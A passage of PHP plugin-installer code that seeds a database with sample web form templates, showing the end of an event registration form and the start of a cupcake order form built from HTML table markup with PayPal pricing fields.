value="Corporate Registration ($200 USD)" id="20_elementform_id_temp2" name="20_elementform_id_temp" onclick="set_default(''20'',''2'',''form_id_temp'')"><label id="20_label_element2" class="ch_rad_label" for="20_elementform_id_temp2">Corporate Registration ($200 USD)</label></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr id="21" type="type_radio"><td colspan="2" id="21_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="21_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="21_label_sectionform_id_temp" class=""><span id="21_element_labelform_id_temp" class="label">Accommodation Package</span><span id="21_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="21_element_sectionform_id_temp" class=""><input type="hidden" value="type_radio" name="21_typeform_id_temp" id="21_typeform_id_temp"><input type="hidden" value="no" name="21_requiredform_id_temp" id="21_requiredform_id_temp"><input type="hidden" value="no" name="21_randomizeform_id_temp" id="21_randomizeform_id_temp"><input type="hidden" value="no" name="21_allow_otherform_id_temp" id="21_allow_otherform_id_temp"><input type="hidden" value="1" name="21_rowcol_numform_id_temp" id="21_rowcol_numform_id_temp"><table><tbody id="21_table_little"><tr id="21_element_tr0"><td valign="top" id="21_td_little0" idi="0"><input type="radio" value="None" id="21_elementform_id_temp0" name="21_elementform_id_temp" onclick="set_default(''21'',''0'',''form_id_temp'')"><label id="21_label_element0" class="ch_rad_label" for="21_elementform_id_temp0">None</label></td></tr><tr id="21_element_tr1"><td valign="top" id="21_td_little1" idi="1"><input type="radio" value="2 Days in 3 Star Hotel ($300 USD)" id="21_elementform_id_temp1" name="21_elementform_id_temp" onclick="set_default(''21'',''1'',''form_id_temp'')"><label id="21_label_element1" class="ch_rad_label" for="21_elementform_id_temp1">2 Days in 3 Star Hotel ($300 USD)</label></td></tr><tr id="21_element_tr2"><td valign="top" id="21_td_little2" idi="2"><input type="radio" value="2 Days in 4 Star Hotel ($550 USD)" id="21_elementform_id_temp2" name="21_elementform_id_temp" onclick="set_default(''21'',''2'',''form_id_temp'')"><label id="21_label_element2" class="ch_rad_label" for="21_elementform_id_temp2">2 Days in 4 Star Hotel ($550 USD)</label></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr id="11" type="type_paypal_checkbox"><td colspan="2" id="11_label_and_element_sectionform_id_temp" class="toolbar_padding"><table id="11_elemet_tableform_id_temp"><tbody><tr><td valign="top" align="left" id="11_label_sectionform_id_temp" class=""><span id="11_element_labelform_id_temp" class="label">Additional</span><span id="11_required_elementform_id_temp" class="required"></span></td></tr><tr><td valign="top" align="left" id="11_element_sectionform_id_temp" class=""><input type="hidden" value="type_paypal_checkbox" name="11_typeform_id_temp" id="11_typeform_id_temp"><input type="hidden" value="no" name="11_requiredform_id_temp" id="11_requiredform_id_temp"><input type="hidden" value="no" name="11_randomizeform_id_temp" id="11_randomizeform_id_temp"><input type="hidden" value="no" name="11_allow_otherform_id_temp" id="11_allow_otherform_id_temp"><input type="hidden" value="0" name="11_allow_other_numform_id_temp" id="11_allow_other_numform_id_temp"><table><tbody id="11_table_little"><tr id="11_element_tr0"><td valign="top" id="11_td_little0" idi="0"><input type="checkbox" id="11_elementform_id_temp0" name="11_elementform_id_temp0" value="10" onclick="set_checked(''11'',''0'',''form_id_temp'')"><label id="11_label_element0" class="ch_rad_label" for="11_elementform_id_temp0">I''m also buying the t-shirt of the event ($10 USD)</label><input type="hidden" id="11_elementlabel_form_id_temp0" name="11_elementform_id_temp0_label" value="I''m also buying the t-shirt of the event ($10 USD)"></td></tr></tbody></table><div id="11_divform_id_temp"></div></td></tr></tbody></table></td></tr><tr id="12" type="type_submit_reset"><td colspan="2" class="toolbar_padding" id="12_label_and_element_sectionform_id_temp"><table id="12_elemet_tableform_id_temp"><tbody><tr><td valign="middle" align="left" id="12_label_sectionform_id_temp" class="" style="display: none;"><span id="12_element_labelform_id_temp" style="display: none;">type_submit_reset_12</span></td><td valign="middle" align="left" id="12_element_sectionform_id_temp" class=""><input type="hidden" value="type_submit_reset" name="12_typeform_id_temp" id="12_typeform_id_temp"><button type="button" class="button_submit" id="12_element_submitform_id_temp" value="Submit" onclick="check_required(''submit'', ''form_id_temp'');">Submit</button><button type="button" class="button_reset" id="12_element_resetform_id_temp" value="Reset" onclick="check_required(''reset'');">Reset</button></td></tr></tbody></table></td></tr></tbody></table></td></tr><tr class="wdform_footer"><td colspan="100" valign="top"><table width="100%" style="padding-right:170px"><tbody><tr id="form_id_temppage_nav1"></tr></tbody></table></td></tr></tbody></table>', 24, '// before form is load\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// before form submit\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// before form reset\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 1, '<p>%all%</p>', '<p>%all%</p>', 22, '13#**id**#Name#**label**#type_name#****#2#**id**#E-mail#**label**#type_submitter_mail#****#14#**id**#Street Address#**label**#type_address#****#15#**id**#Street Address Line 2#**label**#type_address#****#16#**id**#City#**label**#type_address#****#17#**id**#State / Province / Region#**label**#type_address#****#18#**id**#Postal / Zip Code#**label**#type_address#****#19#**id**#Country#**label**#type_address#****#20#**id**#Registration Package#**label**#type_radio#****#21#**id**#Accommodation Package#**label**#type_radio#****#11#**id**#Additional#**label**#type_paypal_checkbox#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****#1#**id**#Name#**label**#type_name#****#3#**id**#Street Line#**label**#type_address#****#4#**id**#Street Line2#**label**#type_address#****#5#**id**#City#**label**#type_address#****#6#**id**#State#**label**#type_address#****#7#**id**#Postal#**label**#type_address#****#8#**id**#Country#**label**#type_address#****#9#**id**#Registration Package#**label**#type_paypal_radio#****#10#**id**#Accommodation Package#**label**#type_paypal_radio#****#', '13#**id**#Name#**label**#type_name#****#2#**id**#E-mail#**label**#type_submitter_mail#****#14#**id**#Street Address#**label**#type_address#****#15#**id**#Street Address Line 2#**label**#type_address#****#16#**id**#City#**label**#type_address#****#17#**id**#State / Province / Region#**label**#type_address#****#18#**id**#Postal / Zip Code#**label**#type_address#****#19#**id**#Country#**label**#type_address#****#20#**id**#Registration Package#**label**#type_radio#****#21#**id**#Accommodation Package#**label**#type_radio#****#11#**id**#Additional#**label**#type_paypal_checkbox#****#12#**id**#type_submit_reset_12#**label**#type_submit_reset#****#', 0, 'none', 'false', 'true', '', '', '', 0, 'testmode', '', 'USD', 0, '', '', '', '', '', '');
HEREQUERYFORM;
    $form_maker_rows11 = <<<HEREQUERYFORM
    INSERT INTO `{$table_name}` (`title`, `mail`, `form`, `form_front`, `theme`, `javascript`, `submit_text`, `url`, `submit_text_type`, `script_mail`, `script_mail_user`, `counter`, `label_order`, `label_order_current`, `article_id`, `pagination`, `show_title`, `show_numbers`, `public_key`, `private_key`, `recaptcha_theme`, `paypal_mode`, `checkout_mode`, `paypal_email`, `payment_currency`, `tax`, `from_mail`, `from_name`, `script1`, `script2`, `script_user1`, `script_user2`) VALUES
    ('Cupcake Order Form', '', '<table cellpadding="4" cellspacing="0" class="wdform_table1" style="border-top:0px solid black;"><tbody id="form_id_tempform_view1" class="wdform_tbody1" page_title="Untitled page" next_title="Next" next_type="button" next_class="wdform_page_button" next_checkable="false" previous_title="Previous" previous_type="button" previous_class="wdform_page_button" previous_checkable="false"><tr class="wdform_tr1"><td class="wdform_td1"><table class="wdform_table2"><tbody class="wdform_tbody2"><tr id="1" type="type_date"><td valign="middle" align="left" id="1_label_sectionform_id_temp" class=""><span id="1_element_labelform_id_temp" class="label">Choose your date for pick up:</span><span id="1_required_elementform_id_temp" class="required"></span></td><td valign="middle" align="left" id="1_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_date" name="1_typeform_id_temp" id="1_typeform_id_temp"><input type="hidden" value="no" name="1_requiredform_id_temp" id="1_requiredform_id_temp"><input type="text" value="" class="wdform_date" id="1_elementform_id_temp" name="1_elementform_id_temp" maxlength="10" size="10" onchange="change_value(''1_elementform_id_temp'')"><input id="1_buttonform_id_temp" class="button" type="reset" value="..." format="%Y-%m-%d" onclick="return showCalendar(''1_elementform_id_temp'' ,''%Y-%m-%d'')"></td><td id="X_1" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_1" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;1&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="16" type="type_time"><td valign="top" align="left" id="16_label_sectionform_id_temp" class=""><span id="16_element_labelform_id_temp" class="label">Time:</span><span id="16_required_elementform_id_temp" class="required"></span></td><td valign="middle" align="left" id="16_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_time" name="16_typeform_id_temp" id="16_typeform_id_temp"><input type="hidden" value="no" name="16_requiredform_id_temp" id="16_requiredform_id_temp"><table id="16_table_time" cellpadding="0" cellspacing="0"><tbody><tr id="16_tr_time1"><td id="16_td_time_input1" style="width: 32px;"><input type="text" value="" class="time_box" id="16_hhform_id_temp" name="16_hhform_id_temp" onkeypress="return check_hour(event, ''16_hhform_id_temp'', ''23'')" onkeyup="change_hour(event, ''16_hhform_id_temp'',''23'')" onblur="add_0(''16_hhform_id_temp'')"></td><td align="center"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></td><td id="16_td_time_input2" style="width: 32px;"><input type="text" value="" class="time_box" id="16_mmform_id_temp" name="16_mmform_id_temp" onkeypress="return check_minute(event, ''16_mmform_id_temp'')" onkeyup="change_minute(event, ''16_mmform_id_temp'')" onblur="add_0(''16_mmform_id_temp'')"></td><td align="center"><span class="wdform_colon" style="vertical-align: middle;">&nbsp;:&nbsp;</span></td><td id="16_td_time_input3" style="width: 32px;"><input type="text" value="" class="time_box" id="16_ssform_id_temp" name="16_ssform_id_temp" onkeypress="return check_second(event, ''16_ssform_id_temp'')" onkeyup="change_second(event, ''16_ssform_id_temp'')" onblur="add_0(''16_ssform_id_temp'')"></td></tr><tr id="16_tr_time2"><td id="16_td_time_label1"><label class="mini_label" id="16_mini_label_hh">HH</label></td><td></td><td id="16_td_time_label2"><label class="mini_label" id="16_mini_label_mm">MM</label></td><td></td><td id="16_td_time_label3"><label class="mini_label" id="16_mini_label_ss">SS</label></td></tr></tbody></table></td><td id="X_16" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;16&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_16" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;16&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_16" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;16&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_16" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;16&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_16" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;16&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_16" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;16&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_16" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;16&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_16" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;16&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_16" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;16&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="13" type="type_name"><td valign="top" align="left" id="13_label_sectionform_id_temp" class=""><span id="13_element_labelform_id_temp" class="label">Full Name:</span><span id="13_required_elementform_id_temp" class="required"> *</span></td><td valign="top" align="left" id="13_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_name" name="13_typeform_id_temp" id="13_typeform_id_temp"><input type="hidden" value="yes" name="13_requiredform_id_temp" id="13_requiredform_id_temp"><input type="hidden" value="no" name="13_uniqueform_id_temp" id="13_uniqueform_id_temp"><table id="13_table_name" cellpadding="0" cellspacing="0"><tbody><tr id="13_tr_name1"><td id="13_td_name_input_first"><input type="text" class="input_deactive" id="13_element_firstform_id_temp" name="13_element_firstform_id_temp" value="" title="" onfocus="delete_value(&quot;13_element_firstform_id_temp&quot;)" onblur="return_value(&quot;13_element_firstform_id_temp&quot;)" onchange="change_value(''13_element_firstform_id_temp'')" style="margin-right: 10px; width: 100px;"></td><td id="13_td_name_input_last"><input type="text" class="input_deactive" id="13_element_lastform_id_temp" name="13_element_lastform_id_temp" value="" title="" onfocus="delete_value(&quot;13_element_lastform_id_temp&quot;)" onblur="return_value(&quot;13_element_lastform_id_temp&quot;)" onchange="change_value(''13_element_lastform_id_temp'')" style="margin-right: 10px; width: 100px;"></td></tr><tr id="13_tr_name2"><td id="13_td_name_label_first" align="left"><label class="mini_label" id="13_mini_label_first">First</label></td><td id="13_td_name_label_last" align="left"><label class="mini_label" id="13_mini_label_last">Last</label></td></tr></tbody></table></td><td id="X_13" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_13" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;13&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="5" type="type_submitter_mail"><td valign="middle" align="left" id="5_label_sectionform_id_temp" class=""><span id="5_element_labelform_id_temp" class="label">E-mail:</span><span id="5_required_elementform_id_temp" class="required"> *</span></td><td valign="middle" align="left" id="5_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_submitter_mail" name="5_typeform_id_temp" id="5_typeform_id_temp"><input type="hidden" value="yes" name="5_requiredform_id_temp" id="5_requiredform_id_temp"><input type="hidden" value="no" name="5_sendform_id_temp" id="5_sendform_id_temp"><input type="hidden" value="" name="5_uniqueform_id_temp" id="5_uniqueform_id_temp"><input type="text" class="input_deactive" id="5_elementform_id_temp" name="5_elementform_id_temp" value="ex: myname@example.com" title="ex: myname@example.com" onfocus="delete_value(''5_elementform_id_temp'')" onblur="return_value(''5_elementform_id_temp'')" onchange="change_value(''5_elementform_id_temp'')" style="width: 200px;"></td><td id="X_5" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_5" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;5&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="14" type="type_phone"><td valign="top" align="left" id="14_label_sectionform_id_temp" class=""><span id="14_element_labelform_id_temp" class="label">Mobile/Phone Number:</span><span id="14_required_elementform_id_temp" class="required"></span></td><td valign="top" align="left" id="14_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_phone" name="14_typeform_id_temp" id="14_typeform_id_temp"><input type="hidden" value="no" name="14_requiredform_id_temp" id="14_requiredform_id_temp"><input type="hidden" value="" name="14_uniqueform_id_temp" id="14_uniqueform_id_temp"><table id="14_table_name" cellpadding="0" cellspacing="0"><tbody><tr id="14_tr_name1"><td id="14_td_name_input_first"><input type="text" class="input_deactive" id="14_element_firstform_id_temp" name="14_element_firstform_id_temp" value="" title="" onfocus="delete_value(&quot;14_element_firstform_id_temp&quot;)" onblur="return_value(&quot;14_element_firstform_id_temp&quot;)" onchange="change_value(''14_element_firstform_id_temp'')" onkeypress="return check_isnum(event)" style="width: 50px;"><span class="wdform_line" style="margin: 0px 4px; padding: 0px;">-</span></td><td id="14_td_name_input_last"><input type="text" class="input_deactive" id="14_element_lastform_id_temp" name="14_element_lastform_id_temp" value="" title="" onfocus="delete_value(&quot;14_element_lastform_id_temp&quot;)" onblur="return_value(&quot;14_element_lastform_id_temp&quot;)" onchange="change_value(''14_element_lastform_id_temp'')" onkeypress="return check_isnum(event)" style="width: 135px;"></td></tr><tr id="14_tr_name2"><td id="14_td_name_label_first" align="left"><label class="mini_label" id="14_mini_label_area_code">Area Code</label></td><td id="14_td_name_label_last" align="left"><label class="mini_label" id="14_mini_label_phone_number">Phone Number</label></td></tr></tbody></table></td><td id="X_14" valign="middle" align="right" class="element_toolbar"><img src="{$plugin_path}/images/delete_el.png" title="Remove the field" onclick="remove_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;delete_el&quot;)" onmouseout="chnage_icons_src(this,&quot;delete_el&quot;)" style="cursor: pointer; margin: 2px;"></td><td id="left_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/left.png" title="Move the field to the left" onclick="left_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;left&quot;)" onmouseout="chnage_icons_src(this,&quot;left&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="up_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/up.png" title="Move the field up" onclick="up_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;up&quot;)" onmouseout="chnage_icons_src(this,&quot;up&quot;)" style="cursor: pointer;"></td><td id="down_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/down.png" title="Move the field down" onclick="down_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;down&quot;)" onmouseout="chnage_icons_src(this,&quot;down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="right_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/right.png" title="Move the field to the right" onclick="right_row(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;right&quot;)" onmouseout="chnage_icons_src(this,&quot;right&quot;)" style="cursor: pointer;"></td><td id="edit_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/edit.png" title="Edit the field" onclick="edit(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;edit&quot;)" onmouseout="chnage_icons_src(this,&quot;edit&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/dublicate.png" title="Dublicate the field" onclick="dublicate(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;dublicate&quot;)" onmouseout="chnage_icons_src(this,&quot;dublicate&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="dublicate_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_down.png" title="Move the field to the lower page" onclick="page_down(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;page_down&quot;)" onmouseout="chnage_icons_src(this,&quot;page_down&quot;)" style="margin: 2px; cursor: pointer;"></td><td id="page_up_14" valign="middle" class="element_toolbar"><img src="{$plugin_path}/images/page_up.png" title="Move the field to the upper page" onclick="page_up(&quot;14&quot;)" onmouseover="chnage_icons_src(this,&quot;page_up&quot;)" onmouseout="chnage_icons_src(this,&quot;page_up&quot;)" style="margin: 2px; cursor: pointer;"></td></tr><tr id="7" type="type_paypal_checkbox"><td valign="top" align="left" id="7_label_sectionform_id_temp" class=""><span id="7_element_labelform_id_temp" class="label">Cupcakes Flavors (1 doz. minimum)</span><span id="7_required_elementform_id_temp" class="required"> *</span></td><td valign="top" align="left" id="7_element_sectionform_id_temp" class=" toolbar_padding"><input type="hidden" value="type_paypal_checkbox" name="7_typeform_id_temp" id="7_typeform_id_temp"><input type="hidden" value="yes" name="7_requiredform_id_temp" id="7_requiredform_id_temp"><input type="hidden" value="no" name="7_randomizeform_id_temp" id="7_randomizeform_id_temp"><input type="hidden" value="no" name="7_allow_otherform_id_temp" id="7_allow_otherform_id_temp"><input type="hidden" value="0" name="7_allow_other_numform_id_temp" id="7_allow_other_numform_id_temp"><table><tbody id="7_table_little"><tr id="7_element_tr0"><td valign="top" id="7_td_little0" idi="0"><input type="checkbox" id="7_elementform_id_temp0" name="7_elementform_id_temp0" value="15" onclick="set_checked(''7'',''0'',''form_id_temp'')"><label id="7_label_element0" class="ch_rad_label" for="7_elementform_id_temp0">Red Velvet ($15.00)</label><input type="hidden" id="7_elementlabel_form_id_temp0" name="7_elementform_id_temp0_label" value="Red Velvet ($15.00)"></td></tr><tr id="7_element_tr1"><td valign="top" id="7_td_little1" idi="1"><input type="checkbox" id="7_elementform_id_temp1" name="7_elementform_id_temp1" value="10" onclick="set_checked(''7'',''1'',''form_id_temp'')"><label id="7_label_element1" class="ch_rad_label" for="7_elementform_id_temp1">Vanilla ($10.00)</label><input type="hidden" id="7_elementlabel_form_id_temp1" name="7_elementform_id_temp1_label" value="Vanilla ($10.00)"></td></tr><tr id="7_element_tr2"><td valign="top" id="7_td_little2" idi="2"><input type="checkbox" id="7_elementform_id_temp2" name="7_elementform_id_temp2" value="12" onclick="set_checked(''7'',''2'',''form_id_temp'')"><label id="7_label_element2" class="ch_rad_label" for="7_elementform_id_temp2">Chocolate ($12.00)</label><input type="hidden" id="7_elementlabel_form_id_temp2" name="7_elementform_id_temp2_label" value="Chocolate ($12.00)"></td></tr><tr id="7_element_tr3"><td valign="top" id="7_td_little3" idi="3"><input type="checkbox" id="7_elementform_id_temp3" name="7_elementform_id_temp3" value="15" onclick="set_checked(''7'',''3'',''form_id_temp'')"><label id="7_label_element3" class="ch_rad_label" for="7_elementform_id_temp3">Guinness 